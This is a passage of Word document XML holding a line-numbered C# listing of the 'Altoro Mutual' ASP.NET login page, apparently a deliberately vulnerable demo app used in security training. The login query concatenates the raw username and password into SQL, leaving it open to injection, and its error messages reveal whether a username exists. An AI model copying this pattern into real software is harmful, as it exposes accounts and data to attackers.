              <w:t>121</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>130</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>131</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>134</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>136</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>137</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>138</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>142</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>143</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>144</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>146</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>148</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>149</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12165"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using System.Data;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Data.SqlClient;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Data.OleDb;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Text.RegularExpressions;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.UI;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.UI.WebControls;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.UI.HtmlControls;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Configuration;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>namespace Altoro</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  public partial class Authentication : Page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protected void Page_Load(object sender, System.EventArgs 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 Put user code to initialize the page here</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      Response.Cache.SetCacheability(HttpCacheability.NoCache);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      HtmlMeta meta = new HtmlMeta();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      HtmlHead head = (HtmlHead)Page.Header;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      meta.Name = "keywords";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      meta.Content = "Altoro Mutual Login, login, authenticate";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      head.Controls.Add(meta);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      if(Request.Params["passw"] != null)</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String uname = Request.Params["uid"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        String passwd = Request.Params["passw"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        String msg = ValidateUser(uname, passwd);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        if (msg == "Success")</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Response.Redirect("main.aspx");</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else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message.Text = "Login Failed: " + msg;</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protected string ValidateUser(String uName, String pWord)</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//Set default status to Success</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      string status = "Success";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      OleDbConnection myConnection = new OleDbConnection();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      myConnection.ConnectionString = ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      myConnection.Open();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      string query2 = "SELECT * From users WHERE username = '" + uName + "'";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      string query1 = query2 + " AND password = '" + pWord + "'";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      if (ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString.Contains("Microsoft.Jet.OLEDB.4.0"))</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 Hack for MS Access which can not terminate a string</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          query1 = Regex.Replace(query1, "--.*", "");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          query2 = Regex.Replace(query2, "--.*",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DataSet ds = new DataSet();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      OleDbDataAdapter myLogin = new OleDbDataAdapter(query1, myConnection);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      myLogin.Fill(ds, "user");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      if (ds.Tables["user"].Rows.Count==0)</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OleDbDataAdapter myFailed = new OleDbDataAdapter(query2, myConnection);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">              myFailed.Fill(ds, "user");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        if (ds.Tables["user"].Rows.Count==0)</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status = "We're sorry, but this username was not found in our system.  Please try again.";</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else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status = "Your password appears to be invalid.  Please re-enter your password carefully.";</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else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//Get the row returned by the query</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                DataRow myRow = ds.Tables["user"].Rows[0];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          //Set the Session variables.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          Session["userId"] = myRow["userid"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
